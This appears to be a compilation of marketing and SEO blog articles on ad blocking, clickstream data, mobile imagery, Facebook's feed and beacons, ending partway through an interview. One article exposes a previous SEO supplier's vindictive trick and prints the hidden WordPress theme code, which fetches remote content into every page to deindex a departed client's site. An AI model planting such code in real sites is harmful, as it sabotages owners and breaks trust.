Five stats that sum up the rise of ad blocking


Love them or loathe them, ad blockers aren’t going anywhere soon, forcing digital publishers to sit down and have a serious rethink about their marketing strategies.

According to PageFair, which works with publishers to minimise the impact of ad blocking, web users are taking to blocking ads in their hundreds of millions.

To mark the publication of our first Zoom In report, Ad blockers: The lay of the land, we present five stats that we think best tell the story of ad blocking, but first, here’s one for free: according to the UK Association of Online Publishers, 65% of publishers see ad blocking as a threat to the publishing business model.

But is it all doom and gloom? Let’s see what else the stats have to say.

$41.4bn: the estimated global cost of ad blocking this year (PageFair, 2015)

Let’s get the bad news out of the way first. Ad blocking is expensive for publishers, who need the ads to pay for the content they’re serving us, often absolutely free of charge.

According to PageFair, blocking those revenue-bringing ads will deprive the industry of $41.4bn by the end of this year. Ouch.

100m: number of Adblock Plus active users (Adblock Plus, 2016)

Perhaps the best known of the ad blocking brigade (and the biggest stone in the shoe of German publishing group Axel Springer, which has taken them to court), Cologne-based Adblock Plus was pleased to announce in May that it had more than 100 million active users, which it counts as active installations of its ad blocking platform.

That’s 100 million fewer devices publishers can serve their ads to. Food for thought.

22% of the world’s smartphone users are now using ad blockers (PageFair, 2016)

If the ad blocking battle began on desktop, the war will be in the realm of mobile.

A combination of easier access to ad blocking software on smartphones, and the greater availability of smartphones in emerging markets is driving this – 36% of smartphone users in Asia Pacific are blocking ads.

And apps aren’t beyond the reach of ad blockers anymore, as it’s now also possible to block in-app ads.

$9.50: the cost of loading one news site’s ads every day for a month (New York Times, 2015)

Many people block ads because they can be annoying. Others may be concerned about the malware they can carry. But another big reason is their loading times and their drain on mobile data – data that we’re paying for.

Last autumn the New York Times set out to discover just how much loading the ads on a range of news websites would cost on the average American mobile data plan over the course of a month.

It found that the most data-hungry of the sites cost just shy of $10 over the 30 days.
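The arithmetic behind a figure like this is straightforward: daily ad payload, times days in the month, times the per-megabyte price of a data plan. A minimal sketch – the payload and price numbers below are invented for illustration, not the Times’ actual measurements:

```python
# Hypothetical inputs: ad payload per daily visit and the per-MB price
# of an average US mobile data plan. Both numbers are made up.
AD_MB_PER_VISIT = 10.8   # MB of ad-related data downloaded per daily visit
PRICE_PER_MB = 0.0292    # dollars per MB of mobile data
DAYS = 30                # one month of daily visits

monthly_ad_cost = AD_MB_PER_VISIT * DAYS * PRICE_PER_MB
print(f"Ads cost ${monthly_ad_cost:.2f} over {DAYS} days")
# → Ads cost $9.46 over 30 days
```

Plug in your own site’s ad weight (visible in any browser’s network inspector) to see what you are asking mobile readers to pay.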

20% of people in the UK who have downloaded an ad blocker no longer use it (IAB, 2016)

Let’s end on a sweeter note for publishers. While ad blocker use is increasing rapidly in emerging markets, this stat suggests that the upward trend may start to slow in the UK.

IAB says the primary reason for users abandoning their ad blockers is switching to a new device, but the second most cited reason was a lack of access to content the users wanted – so perhaps the publishers’ strategy of walling off content until the user turns off their ad blocker is working.

Download your free copy of the Zoom In report Ad blocking: The lay of the land, which features exclusive insights from experts in digital media, publishing and technology, as well as the latest stats to bring you a well-rounded, easily digestible analysis of the ad blocking situation as it stands.

How to create insights from consumers’ click histories


Without any action behind it, data is just a bunch of numbers. Clickstream data is particularly valuable, providing insights about what consumers are doing.

Data alone does not lead to insights. Analyzed data backed by a hypothesis and placed in the right context, on the other hand, does.

Clickstream information is a particularly good set of data for marketers to examine if they want to understand their customers better and connect with them based on their actions.

The many benefits of clickstream data

With clickstream data, you can examine not only how customers are interacting with your brand, but also what they are doing before and after they arrive at your site.

Clickstream information is based on consumers’ actual click and browsing behaviors, with records of click-throughs and URLs visited collected in the order they occurred. This gives marketers important, industrywide insight into online behavior, the customer journey through the funnel, and user experiences.

Rather than providing simple numbers of visits or sales, clickstream information reflects consumer behavior based on actual activity, and identifies areas where companies could improve and where the competition might be doing better.

The insights garnered from clickstream data may not always match your hypothesis, but they are always useful if you ask the right questions.

Don’t collect data just because numbers are nice to fall back on. Instead, focus on collecting information like click history that is directly tied to your business objectives and key performance indicators.

Identify what you want to learn, and focus your collection and analysis on that specific data subset.

Make the most of your clickstream data

Creating actionable insights out of your data is essential to portraying a full and accurate picture of the customer journey. Maximize the effectiveness of your clickstream analysis by employing these three tactics:

1. Have a hypothesis

This is a minimum requirement for a data project to be efficient and lead to insights. Without a hypothesis, you’re just wasting time. The more specific you are in your data requests, the easier it is for your data team to pinpoint exactly what they need to pull, analyze, and provide.

You don’t have to be sure of the outcome, and the data may prove you wrong, but that’s OK. Just be sure your data team enters a project focused and that they reach a conclusion.

Let’s say you run a display campaign to drive awareness and clicks to your own site for a product. If you sell that product through third-party distributors, like Amazon or Target, your hypothesis might be that your display campaign is influencing purchase behavior and conversions on these third-party sites. Without clickstream data, it’s very hard to connect those two pieces and prove or disprove this hypothesis.

2. Tie your analysis to KPIs

Your analysis might reveal plenty of information about how consumers reach and interact with your brand or with your competition, but not all information yields actionable insights. You might find that consumers searching your website tend to search three times. That’s interesting, but you don’t gain real insights from it without understanding how their search activity affects their subsequent behavior or how it differs from consumer search activity on competitors’ sites.

Structuring your hypothesis and analysis around KPIs diminishes the risk of reaching insights that are not actionable. If your leading KPI is, say, trial subscriptions, look into the trial conversion flow of your competitors, and reverse engineer their customer journey through the funnel to detect conversion and abandonment trends at each step.

If the vast majority of consumers bounce during step three of five on your site (but not on your competitors’ sites), test out consolidation steps to improve the user experience and increase conversions.
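That kind of step-by-step funnel comparison is simple arithmetic once the clickstream has been grouped into steps. A quick sketch, with invented visitor counts standing in for real clickstream data:

```python
# Hypothetical five-step trial sign-up funnel; counts are the number of
# visitors whose clickstream reached each step.
steps = ["landing", "plan choice", "account details", "payment", "confirmation"]
visitors = [10_000, 6_200, 4_900, 1_100, 950]

# Drop-off at each step is the share of visitors who did not continue.
for i in range(1, len(visitors)):
    kept = visitors[i] / visitors[i - 1]
    print(f"{steps[i - 1]} -> {steps[i]}: {kept:.0%} continue, {1 - kept:.0%} drop off")
```

Run the same calculation for your own funnel and a competitor’s: the transition with the largest drop-off (here, the move to payment) is the one to test consolidating.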

3. Identify your output goals

Without a clear goal for what you intend to do with clickstream data, you cannot transform it into actionable insights. Are you studying customer journeys to optimize conversions or user experience? Are you looking for details about PR or case studies to grow brand awareness and generate leads?

Answering these questions and setting intentions for your data will help you in many ways, from filtering data requests from the get-go to guiding your thought process when focusing your data request and analysis.

By analyzing customers’ online actions – clicks, purchases on other sites, and browsing history – with specific output goals, you reveal a world of insight into how they interact with your brand’s web properties and your competition, and how they react to your offering.

Don’t collect clickstream data just for the sake of collecting it. Understand what you want to investigate and how you can benefit from it. Make sure it’s relevant to your company, and then analyze clickstream data to better understand your customers’ actions and optimize their experience.

Marketers need to go beyond just the numbers and patterns that data provides if they want to successfully understand and connect with consumers. Focusing on customer actions will lead to a better understanding of your audience and what resonates with them, increasing the success of your marketing efforts and, ultimately, creating a better business.

This is an abridged version of an article published earlier this week on our sister site ClickZ.

How to use images to bring real world credibility to your digital presence


We all know the importance of imagery, especially on mobile. However, the focus on icons and the fear of oversized pages has caused many designers to forget the power of pictures.

The right emotive photograph, of the right proportions, that loads rapidly is a fantastic way to bring your offline identity into an otherwise homogeneous digital world.

In the physical world, many people love (or love the idea of) shopping in independent shops – music shops, fashion, books, surf shops, bicycles, delicatessens etc. – eating in independent restaurants and/or staying in independent hotels. There’s some joy in their individuality, expertise, quirkiness, familiarity. However, this differentiation often fails to translate into the digital world.

This is particularly the case in retail. Too often websites are simply a list of products – often the same or similar products as can be found at plenty of other retailers, sometimes at a better price – with little (bar a logo) to express the retailer’s unique selling proposition (USP) that is so evident offline.

A perfect picture is worth a thousand words

On the high street, consumers are attracted into stores, restaurants and bars by what they see. The façade, name, logo and any call to action (e.g. “50% off”) all help gain attention, but mostly it is what we see inside.

This is why all shops and many other establishments have big windows. Sometimes it’s just a showcase window display, but often the window provides the opportunity to gaze into the soul and grasp the identity of the place.

It is this unique identity that most websites lack online and really lack on mobile.

Take a look at the mobile site of Daunt Books below. That photograph of the flagship London store tells you more about this retailer than any “about” section, review or product catalogue.

It’s there: front and center, whatever the device. You don’t need to ever have visited the real store to know this isn’t Amazon, Walmart, Tesco or Barnes & Noble.

Daunt Books is not a perfect mobile experience, but it is considerably better than many independent retailers (plenty of chains also) and, with those images, it is certainly one of the most elegant.

If you’ve got it, should you flaunt it?

So while we’re shopping in London, let’s visit the iconic department store Liberty. The image below shows the different experiences that greet the visitor to the physical store and to the mobile site. To find a picture of the store on the mobile site you need to look in the location tab.

Then let’s skip across the channel to Paris, to compare the gorgeous interior of Galeries Lafayette, pictured below, with its digital presence.

As you visit more sites of the world’s iconic department stores, it quickly becomes clear that they have all taken the decision to focus solely on product, with a utilitarian (though ironically not always user friendly) mobile web presence.

Try this: put your finger over the logo on any site (web or mobile). Would you recognize the site? Is there anything that gives a hint of the retailer’s real-world physical presence, heritage or brand? Is there anything that demands: when I’m in New York, I’m going straight to this store?

Try Bergdorf Goodman, Bloomingdale’s, or any other of New York’s temples to shopping.


Does this matter?

It seems surprising, when you have an iconic physical presence, not to capitalize on it online, if only to remind the customer of that heritage. But these department stores have strong brands; perhaps they feel the logo (with the look and feel of the site) is all that is required to give customers a sense of place, belonging and loyalty.

And of course, you can be sure that every retailer has conducted methodical tests to see what works best with mobile customers. Right?

But what about smaller stores, that aren’t such well-known brands?

Pick a list, any list.

Here’s the test.

Everybody loves a best of list. Best hotels in Singapore. Best restaurants in Berlin. The best surf shops in the world. Best coffee, boutiques, pubs… whatever your poison.

All best of lists have a tried and tested format.

  • Name of store/outlet/place
  • Photo of store
  • Description of store
  • Name of store
  • Photo of store
  • Etc…

For example, take a look at: America’s 15 Greatest Independent Record Stores according to Gear Patrol. This was chosen purely at random for this test.

Record stores are a great example because they look fantastic in photos, even if you are not a big fan. If you are a fan… you can almost smell the vinyl. But all sorts of outlets look great in a good photograph, inside or storefront: skateboards, mountain bikes, shoes, garden nurseries, bars, restaurants, hotels… That’s why we love the tried-and-tested list format.

The question is: when you tap through to this outlet that looked so great in the physical world, do you get a mobile (or PC) experience as compelling as that image? Because, let’s face it, no normal person is going to physically visit 15 record stores from San Francisco to Brooklyn; but plenty of people might indulge in a little m-commerce.

The image below shows a screenshot of our record store list on the left (a tablet view, much reduced), with screenshots from various examples, good and bad, mobile friendly and not, from the sites to which the list linked (the screenshots are taken on a Samsung S6, but iPhone 6 looks similar using Mobilizer, which is a freemium tool).


How to research

Conduct tests repeatedly on all best of lists you can find. You can use directory services such as Yelp or TripAdvisor, but these are less fun or interesting than random curated lists.

The test:

  • Pick lists related to, and unrelated to, your business.
  • Try best in the world and by country, city – not just your own.
  • Conduct it on a mobile device – ideally more than one type of device.
  • Don’t just do it on WiFi; do it at the bus stop, on the train, in the pub.
  • Rate each site on immediate impact. Does it grab your attention and draw you in? Why?
  • Did the images make the site slow to load? Enough time to make you bored?
  • Do images justify the real estate they take up on the screen?
  • Then conduct a more thorough investigation.
  • Then back up your findings with user testing.

Mobile as a brochure for your real world experience

Arguably it is even more important to capture the essence of your physical presence, if mobile (and digital) is a vehicle to drive and/or pay for visits to your business in the real world.

If you are in any of the following kinds of businesses, it’s not just a very good idea; it is, arguably, imperative to use powerful, compelling imagery:

  • Hotels, restaurants, bars and clubs.
  • Museums and galleries.
  • Entertainment e.g. sports centers, bowling, ice skating.
  • Shopping centers.
  • Locations – countries, cities, neighborhoods, parks, beaches.

Not only do customers need to know what they are committing to or purchasing – i.e. is it their sort of place, people, good time – but also what the place actually looks like, so they can find it.

The following image shows four mobile experiences for the first five featured on Top 10 Museums and Galleries according to National Geographic. Two of the five, Le Louvre, Paris, France; and The Acropolis Museum, Athens, Greece (not pictured) lacked a mobile-friendly presence.

The homepages of The Smithsonian Institution, Washington, D.C. USA; State Hermitage, St. Petersburg, Russia; and The British Museum, London, England all suggest quite different approaches to mobile – including use of imagery.


Now let’s look at hotels:

The following image shows the four results randomly chosen from Top 10 good-value hotels in Singapore according to The Guardian.

The images are iPhone 6 screenshots using Mobilizer. While all sites appeared to be mobile-friendly, Mobilizer found some of the sites slow to load and other sites on the Guardian list impossible to load. This may indicate some usability issues, which may or may not be caused by the images used.


Is your picture worth its weight/wait in gold?

A quick test of the four museum sites highlighted above using the excellent WebPagetest revealed that the best performer over a mobile network (at the time of the test) was the homepage of The Smithsonian. Looking at the images you might guess that, but the other results were less predictable.

  • The Smithsonian had a mobile load time of 2.3 seconds.
  • British Museum: 4.1 seconds.
  • The Louvre: 5.8 seconds.
  • State Hermitage: 13.3 seconds.

For the other three sites, the WebPagetest results flagged images as one of the issues, and suggested that compressing them should improve performance.

Images will always come at some cost when it comes to performance on a mobile network. It is essential to test your site to check that images are not causing unnecessary delay to page load. Consumers are becoming increasingly intolerant of slow mobile sites, so you must take measures to identify and reduce performance lag.

It is absolutely imperative that you test. Read this guide to testing the mobile-friendliness and performance of your site.

The following tools will help expose any issues, including image problems:

  • Site Speed Data tool in Google Analytics.
  • SEMrush.
  • Google Mobile Usability Report.
  • Google Mobile-friendly test.
  • Bing Mobile Friendliness Tool.
  • Google PageSpeed Insights.

It is absolutely imperative that you also user test to establish if your imagery works with the users and if it justifies any latency in page performance. Read this guide to how to user test.

Among other measures, you should use:

  • Onsite and remote user testing.
  • A/B testing.
  • Heatmaps, such as Clicktale.

Read the full report: DNA of a Great M-Commerce Site Part 1: Planning

Five most interesting search marketing news stories of the week


Look, I’ll level with you, I’ve pretty much just spent the week staring open mouthed at the internet while one more UK political crisis collapses into the next. You probably have too.

It may not have affected your work, but you’ve probably felt less of a need to binge-watch anything particularly dramatic on Netflix.

So basically this is all the latest search-related news that you may have missed over the last week, and frankly nobody would have blamed you if you had. Heck, Google could have announced a new line of sentient killer robots built suspiciously like Arnold Schwarzenegger and nobody would have noticed.

Well hey, let’s see what happens…

Facebook tightens its News Feed algorithm again, publishers feel the pinch

In what is the equivalent of a bank manager shouting at “lousy freeloaders” and emptying a bag of broken glass onto the ground to stop them from sleeping in the doorway, Facebook has strengthened its News Feed algorithm in order to show users fewer posts from publisher pages.

But, as this Buzzfeed article puts it so eloquently, it has been a public vote – and one against seeing more news.

Sure you can argue that Facebook is merely doing this to generate ad revenue from branded pages, but ultimately if its 1.65 billion users aren’t engaging directly with published news content, then it’s not doing Facebook any favours to keep it at the top of News Feeds.

Well that’s depressing. Don’t worry, there’s a 50 Cent Gif in a minute to cheer you up.

Google’s Keyword Planner tool became even more inaccurate

As Chris Lake reported this week, the numbers in Google Keyword Planner have always been somewhat vague, as they’re often rounded up and end with at least one zero.

Sadly these numbers will become even less precise in the very near future as Google has begun combining related terms, pooling them all together and reporting one larger number instead.

“No longer can you separate the data for keyword variants, such as plurals, acronyms, words with spaces, and words with punctuation. As such it would be easy to get a false impression of search volumes, unless you’re aware of the change.”

The most common backlinks are natural

In Glen Allsop’s recent analysis of 1,000 search results, he discovered which kinds of links are most valuable for high rankings.

Natural (or earned) links top the chart of most common backlinks:


The research also found that the volume of backlinks does not correlate with ranking, but the variety of linking domains and longer word counts do help.

Check out the complete research here: State of Link Building 2016.

Google’s local 3-pack may now include paid listings

As reported in SEJ this week, Google’s organic listings may begin showing ads for certain localised searches.

Here’s the crappy photo I took of the presentation showing the 3-pack with 1 ad. #SMX #SMXLocal

— Joy Hawkins (@JoyanneHawkins) June 21, 2016

As SEJ lead news reporter Matt Southern suggests:

“The ramifications of this change mean that any business can become featured in the local pack just by paying their way to get there. That’s good news for advertisers, but could spell bad news for local businesses who have worked hard to earn a spot in the 3-pack.”

Goodbye crappy lyric sites, Google has taken over

If you’re a regular searcher of song lyrics, they will now be served directly on Google SERPs thanks to a multi-year deal between Google and Toronto-based lyric licensing company LyricFind.

It has already begun…


Although Google horning in on anybody’s racket is normally something to be wary of, this is actually quite a good development, as lyrics websites are pretty awful and awash with horrible advertising.

Sadly it doesn’t have the lyrics to 2 Unlimited’s ‘No Limits’ yet, but that’s probably understandable.

Facebook News Feed update: how #Friendmageddon will affect publishers


Facebook has announced a new change to its News Feed algorithm, favouring personal posts over news stories, in an attempt to maintain its personal element. What does this *really* mean for publishers though?

Facebook is all about connecting people with their friends and family, and despite attempts to diverge from its original concept, it’s not ready to leave that aside yet. That’s why it has decided to downplay stories from publishers in users’ news feeds, in order to promote more personal stories from their favourite people.

This announcement was not warmly welcomed by publishers, as it means that organic reach will probably drop even more (as if it wasn’t already low) and it will be even more challenging from now on to make it to a user’s news feed.

RIP organic reach?

Organic reach was already in decline over the past few years; even before the latest algorithm change, SocialFlow observed a drop of 42% from January to May, which was alarming for Page managers.

It’s apparent that organic reach was becoming more challenging, and that only engagement and relevance could improve it. However, if there was already a 42% drop in posts’ reach from January to May, what can we expect from now on?

Image source: SocialFlow

If Facebook is further promoting personal stories over news and brand posts, will we even be able to talk about organic reach anymore?

Facebook confirmed in its announcement the possibility of reduced organic traffic:

“Overall, we anticipate that this update may cause reach and referral traffic to decline for some Pages. The specific impact on your Page’s distribution and other metrics may vary depending on the composition of your audience. For example, if a lot of your referral traffic is the result of people sharing your content and their friends liking and commenting on it, there will be less of an impact than if the majority of your traffic comes directly through Page posts. We encourage Pages to post things that their audience are likely to share with their friends.”

Publishers are starting to worry about the recent change and this brings about the need to re-evaluate their content strategy, in an attempt to maintain a successful Facebook presence.

Aiming for value and relevance

In Facebook’s own words:

“The goal of News Feed is to show people the stories that are most relevant to them.”

It’s not just about promoting personal stories then, but it’s also about highlighting the content that is relevant for every user. This means that Pages may still maintain their organic reach, provided they understand their audience.

It is becoming more important than ever for a publisher (and any Facebook Page) to post informative and relevant content for its audience, in a way that will maintain engagement and ensure posts are still visible in News Feeds.

Moreover, shareable content – what we also call ‘viral’ – will still be important, as this is the organic way to increase a page’s reach. Creative, unique and authentic content is always appreciated, and this is the only way to maintain organic reach after the algorithm change.

This may require a more extensive analysis of the Page and each post’s performance, although we assume that native videos will still be more important than other types of content. Facebook has been quite clear about its preference for native content, so this might be a good start for your experimentation over the forthcoming months.

Source: Buzzfeed Pound data

Pay for traffic

It is inevitable that publishers will follow marketers in the ‘pay to play’ game on Facebook, in order to maintain their reach, but is every publisher able to do so? And what does this mean for smaller sites?

It won’t be an easy task for a small publication to maintain a Facebook presence without paying to promote (or boost) a post. This doesn’t mean that every small publisher should abandon Facebook, but it may become more challenging and there’ll be a need for more creative solutions.

Maybe it’s the right time for every publisher to understand that heavily depending on Facebook for traffic is not working anymore and it might be a good idea to consider further options, or simply to focus on other aspects of content marketing.

A change in news consumption?

A recent survey by Pew Research Center indicated that 62% of US adults are using social media to keep up with the news and Facebook is by far their first choice, with 67% of them using it for their news updates.


Image source: Pew Research Center

After the News Feed update, people won’t see the same number of news stories in their feeds, which will ultimately affect the success of publishers’ posts.

Rest assured, this is not the end for publishers on Facebook, but it does call for more authentic, interesting, appealing, engaging content, rather than circulating the same old story across all publications.

Once again, big publishers will probably be less affected by this update, due to the authority, the budget and the engagement they already have.

People will not stop consuming content through Facebook; all publishers need to do is find the right way to ‘get access’ to their users’ feeds.

(Hopefully the focus on engagement and virality will not lead to posts of lower quality, simply seeking to grab the audience’s attention)

Boosting the “echo chamber”

Another issue to consider is the filter bubble that Facebook has built over the years, and how it only grows bigger with each update.

People are exposed to the people, posts and stories that are relevant to their interests, their beliefs and their experiences, and this ultimately affects their broader perception of the world.

Eli Pariser wrote in his book ‘The Filter Bubble: What the Internet is Hiding From You’ back in 2011:

“Your computer monitor is a kind of one-way mirror, reflecting your own interests while algorithmic observers watch what you click.”

Meanwhile, Facebook published a post on its News Feed Values, which mentions, among other things:

“Our aim is to deliver the types of stories we’ve gotten feedback that an individual person most wants to see. We do this not only because we believe it’s the right thing but also because it’s good for our business. When people see content they are interested in, they are more likely to spend time on News Feed and enjoy their experience.”

This sums up its concept, the News Feed updates and how our news consumption is changing. As more and more people use the platform to keep up with the news, and as Facebook keeps pushing personal and relevant stories, publishers are also becoming part of a changing reality, one which affects both the creation and the distribution of their future stories.

What’s the next step for publishers on Facebook?

There’s no need to panic (yet) regarding Facebook’s new update, but it may be a good idea to start examining your audience and the reactions your posts trigger, in order to be ready to deal with the new #Friendmageddon.

Every site will need to analyse its current marketing practices, in order to spot opportunities for further development and maintain the referral traffic that Facebook can offer.

Whether you already have an engaged audience or not, Facebook has kindly reminded us once again that nothing can be taken for granted. Time to adjust our social practices, then.


Why you may need to be aware of booby traps when hiring a new SEO

The online marketing world can be something of a wild west in many regards, with SEO at the center of the chaos.

Among the thousands of providers across Australia there is no shortage of promises, case studies and packages available for every business size. The central premise of SEO is that you will get long-term sustained traffic for your investment.

The industry as a whole must deal with a simple paradox: if SEOs do their job properly, they are theoretically no longer needed, and they stand to lose a customer. Meanwhile, if they do not do their job properly, they are guaranteed to lose a customer.

Within 24 hours of one of my SEO clients deciding they were happy enough with their rankings and deciding to pull out of their retainer, one of my other clients had finally finished their 12-month web design and SEO package with their initial provider.

As I was asking myself “how can I adapt my business to allow for sudden client satisfaction?”, my other client was in the process of having their site migrated to my server.

I arrived at my client’s office to begin a day’s work, and we checked the rankings for their site. The migration had been completed a few days prior and had gone through smoothly.

That abysmal feeling of dread came as we saw that the site could no longer be found nestled in its top positions for any of its search terms.

The weird thing was that, as I checked for manual penalties or de-indexation by searching, it became apparent that not every page had been dropped – only the homepage, so far.

This at least narrowed the search down, and meant that I could check the source code for the homepage, and see if there was anything odd going on.

Sure enough, there it was:

This line of code tells Google and other search engines to remove the website from their index, rendering it unfindable. It has its time and place in day-to-day web design and marketing, but clearly does not belong on the homepage of a website that is trying to gain traffic and potential customers.
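A check like this has to run against the rendered page rather than the files on disk, which matters in a case like this one. Here is a minimal Python sketch (the sample HTML and function names are my own illustration, not from the original incident) that inspects a page's served markup for a robots noindex directive:

```python
from html.parser import HTMLParser

class RobotsMetaFinder(HTMLParser):
    """Collects the content of any <meta name="robots"> tags in a page."""
    def __init__(self):
        super().__init__()
        self.directives = []

    def handle_starttag(self, tag, attrs):
        if tag == "meta":
            attrs = dict(attrs)
            if attrs.get("name", "").lower() == "robots":
                self.directives.append(attrs.get("content", "").lower())

def is_noindexed(html):
    """True if the rendered HTML carries a noindex directive."""
    finder = RobotsMetaFinder()
    finder.feed(html)
    return any("noindex" in d for d in finder.directives)

# The kind of tag that deindexes a page, as served to search engines:
page = '<html><head><meta name="robots" content="noindex,nofollow"></head></html>'
print(is_noindexed(page))  # True
```

Run against the live URLs (for example via urllib), a script like this would flag every affected page, even when the string never appears in the site's files.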

I decided to fix the problem first and then later deal with the lingering question of ‘why has this code suddenly turned up?’

Once the hunt had begun for where exactly this code was being generated, I became less and less convinced that this was some sort of accident.

Searching within any of the website files for ‘noindex’ turned up nothing, almost like the code wasn’t actually in there anywhere. Even downloading the entire set of website files and running them through a dedicated file searching tool, we couldn’t find a single instance of ‘noindex’ anywhere within the website.

Sure enough though, the noindex code was in there somewhere, and not just on the front page, it would seem. Google had dropped the front page but had not yet got around to deindexing the rest of the pages, even though every page carried the code.

The webhosting company that oversaw the migration assured me that they had simply taken the site files and placed them on a server, never touching any of the code. They joined the hunt.

We eventually discovered the source of the code; it was both ingenious and simple.

I received an email from the developer in charge of migrating the site:

“We have looked through the code and found the following lines in the theme’s functions.php file…

add_action('wp_head', 'sidebar_config', 1, 3);
function sidebar_config() {
    // Fetches a remote file from the old supplier's server and echoes
    // its contents (the robots meta tags) into every page's <head>.
    $output = file_get_contents('http://robots.clients.(*previous suppliers domain*)');
    echo $output;
}

Disabling only these has resulted in the nofollow,noindex disappearing.

Note that this specifically connects to and retrieves a file from robots.clients.(*previous suppliers domain*) and then outputs the code into your site.”

As I spoke with the developer, he informed me that this code is only triggered if the site is no longer hosted on the previous supplier’s server.

The previous suppliers dismissed it as a mistake, initially trying to tell me that it must have happened during the migration, and later saying that they may have accidentally left the code in there. Who knows.

One thing is for sure: these guys, who have been in business much longer than I have, know their game well.

When a client drops me, I ask myself “what could I have done to keep them happier?” and “should I perhaps package my services better?”

When a client drops them, their entire site gets deindexed.

I think I prefer the soul-searching quest to provide value that people don’t walk away from, rather than the vindictive attempt to shackle a site’s rankings to my server.

How are beacons going to affect search marketing?


Recently I’ve been reading a lot about the effects beacons and proximity marketing may have on search strategy.

(I actually work for a company that makes beacons and management software, so it’s not just me being boring).

I’ve found little doubt that it will bring some very fundamental changes to the way we reach customers, and the type of targeting and data management we’ll need to master in order to do things properly.

Although perhaps not in the way you might think…

Improving proximity results

Search Engine Watch has spoken about beacons a lot in the past, but just in case you need a refresher, a beacon is a tiny device that can transmit a signal to any Bluetooth device in range – phones, fitness bracelets, headphones, smartwatches etc.

Usually this happens through an app (although Google in particular are taking steps to remove this friction and enable direct device communication), and before the privacy police wade in, it’s all completely opt-in.

It certainly has some obvious ramifications for local search.


In the past, we’ve largely been limited to areas defined by map coordinates for localisation. These are fine for locating buildings, but not so hot once people actually enter a space.

Beacons have a big advantage here because they get that location down to an area a couple of metres across, and they allow you to transmit and receive data in real time. If I’m standing by the apples in your supermarket, you can fire me a coupon.

I’m using that example on purpose by the way, and I’ll explain why in a moment.

Beacons don’t need to be interruptive

For marketers, there seems to be an assumption that beacons are an interruptive marketing tool.

Retail couponing is the most obvious use-case after all, but just as early ecommerce sites learned, couponing is no way to build a successful business. And as the publishing industry is learning, interruptive marketing… just isn’t very good really. People don’t like it in most cases.

As I say though, this is only an assumption. The real value of beacons is actually almost the complete opposite of interruptive.

It is in contextual interactions, which usually rely on either an active request from a user, or passive scanning and data aggregation by the person deploying the beacons.

In other words, if I visit a museum, download its app and enable push notifications while I’m there, then I’m actively searching for information about my location.

If not, then I can still be monitored as an anonymous device that is moving around the museum. Once this data is collected, there is a lot of potential value. Maybe it’s time to move that Rodin statue to a more prominent position (possibly next to the gift shop).

Search will need to become hyper-relevant in an open beacon marketplace

So what does this mean for search?

Currently, a lot of local search isn’t that great. There are plenty of fine examples, but there is certainly an adoption curve, particularly for small businesses.

Do a quick search for something like ‘Bike shop, Shrewsbury’ and you can usually see which businesses have a lot of low-hanging SEO fruit that they just aren’t optimising for.

This is a missed chance, but it is usually being missed because of a lack of familiarity and time. People who are busy running a hardware store don’t often have time or money to really concentrate on good SEO.

As beacon deployment becomes more widespread (and it is going to be), this situation is going to change for the user on the ground. App networks and beacons deployed as general infrastructure in more locations mean that local optimisation is opened up to more players, with more resources. Why should our local bike store be wasting time optimising when Raleigh can be doing it for them?

Local SEO will begin to be a wider concern not for the locations themselves, but for the companies that sell through those locations. And those companies have the resources and processes available to start doing a really good job.

There is, however, still a place for the location itself in all this, and that is in adding contextual value, which may not come from purely commercial campaigns.

Recently I visited Edgelands at the Barbican in London, where one of our clients has deployed beacons that guide visitors around the interesting (and slightly confusing) internal space.

The interesting thing here is that it occurs through sound, so that visitors are able to view their surroundings, rather than keeping their eyes glued to their phone screens. It adds context while keeping the visitor engaged with the physical space, rather than having the two vie for attention.

With the rise of experience stores, this is going to become a more important point of differentiation over the next few years. Customers won’t want distracting alerts and pop-ups, they’ll want something that provides a richer experience.

From the marketing side, providing these will become a way to deepen brand affinity as much as increase immediate sales.

Search is about to leave its silos behind

This makes location a strange, mixed bag for search. On one side, brands will provide advertising through app networks and beacon fleets owned by third parties (in my opinion, telcos are currently best placed to handle and benefit from large-scale deployment, as they already have large data networks and physical locations). In many cases, this will be about hyper-localised PPC campaigns.

On the other, locations will provide real-time SEO, with a shifting set of keywords based on whatever is currently happening in-store (or in-museum, or in-restaurant, for instance).

It means that we’ll have to get better at aligning our data and working out which signals really matter, and we’re going to need to get insanely good at management and targeting.

I hate to use this word, but search will need to become more holistic, and even more aligned with marketing. There’s a huge opportunity here for search marketers, customer experience, data management and more.

Google’s Joris Merks on the importance of leadership for digital transformation


Joris Merks is Head of Digital Transformation, Northern Europe at Google, and works with companies to embed digital-first thinking into their strategies.

He’ll be participating in a Google Squared webinar tomorrow (June 30), looking at how to drive a culture of innovation in your company.

Can you tell us a little about your role at Google?

I am EMEA Head of Curriculum Design in the Google Digital Academy team. That means I work with a team and vendors to build workshops and education initiatives that help Google’s advertisers understand the impact of digital on their business and feel equipped for digital transformation.

What does digital transformation mean to you?

I look at digital transformation as a chain reaction of experiments that continuously helps companies to understand how to make the best use of new technology.

In this way they stay in tune with their customers, who are also using digital technology, keeping their businesses ready for the future.

What should the first steps be in a process of digital transformation?

It starts with a clear vision from company leaders of where technology is going and how that could affect the business.

Then these leaders need to give strong signals to people in the company about which challenges need to be fixed, and a culture that rewards experimentation and entrepreneurship needs to be created.

Without this culture, people aren’t very likely to invest in new experiments. This is because any experiment with new technology is always more work and more risk compared to just doing what you have always done. People won’t be willing to take on more work and risk if there is nothing in it for them, or if they might even risk losing their job or bonus when an experiment fails.

Should companies centralise digital functions, or should these be distributed across various teams/departments? What are the pros and cons?

I think it depends on the stage of development a company is in and on the type and size of company. Companies with a digital-focused business model obviously should have centralised digital functions.

Smaller companies tend to have functions where digital and traditional marketing are embedded in the same teams.

Large companies with heritage in the offline world that are in transformation tend to start out with specialised digital teams, which is good for making sure you ramp up fast enough. However, at some point in the digital transformation, new and old teams must break through their silos, because in the end they serve the same customer and should provide a seamless journey across channels.

I believe eventually the differentiation between the two worlds will go away and all marketers will have a digital mindset. For the sake of ramping up fast it can however make sense to have a period where digital is a separate skill set in the organization.

How much of digital transformation is about technology and how much is about culture?

I’d say they are equally important, and next to technology and culture there are also factors such as creativity, knowledge, organisational structure and strategic processes.

For example, if new technology arises, creative people are needed to find out what cool and useful things you can do with that technology.

The people who are creative and the people who understand tech are often not the same type of people, however, so the art is in bringing them together to come up with new ideas to experiment with.

The big trap with digital is that it can be treated too much as a technological development, with the focus largely on data. With that focus, digital will always remain a specialism in the company, and the company will never develop a fully digital mindset.

There are many obstacles facing brands as they examine new digital tactics and technology (e.g. legacy systems). How do you drive digital transformation in such an environment?

